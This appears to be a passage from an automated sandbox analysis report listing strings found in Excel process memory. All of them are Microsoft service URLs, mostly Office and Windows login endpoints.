    Source: EXCEL.EXE, 00000000.00000003.830019835.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887114579.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792860605.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844384510.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.976497308.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.846187037.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847870583.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.831076747.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728160281.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843428711.000000000F1AC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: EXCEL.EXE, 00000000.00000002.980136152.000000000D3AC000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000000.00000003.830019835.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887114579.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792860605.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844384510.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.976497308.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.846187037.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847870583.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.831076747.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728160281.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843428711.000000000F1AC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: EXCEL.EXE, 00000000.00000002.980136152.000000000D3AC000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveMBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: EXCEL.EXE, 00000000.00000002.980136152.000000000D3AC000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaMBI_SSL_SHORTofficeapps.
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech44
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://lifecycle.office.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.com3
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comP
    Source: EXCEL.EXE, 00000000.00000002.984227216.0000000015285000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.727806022.000000001528A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.713085961.000000001528A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830832158.0000000015285000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
    Source: EXCEL.EXE, 00000000.00000003.792419093.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886851258.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829883976.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.842980218.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.982109381.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843787373.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975647498.0000000012A2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847529633.0000000012A13000.00000004.00000001.sdmpString found in binary or memory: https://login.m
    Source: EXCEL.EXE, 00000000.00000003.792419093.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886851258.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829883976.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.842980218.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.982109381.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843787373.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975647498.0000000012A2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847529633.0000000012A13000.00000004.00000001.sdmpString found in binary or memory: https://login.mcro
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/z
    Source: EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmpString found in binary or memory: https://login.wind
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://login.windows.local
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localtesF
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize_3
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize#
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&WP
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize5
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6X
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize7YG
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize:UL
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;Vs
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCZ
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeD
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeDW
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
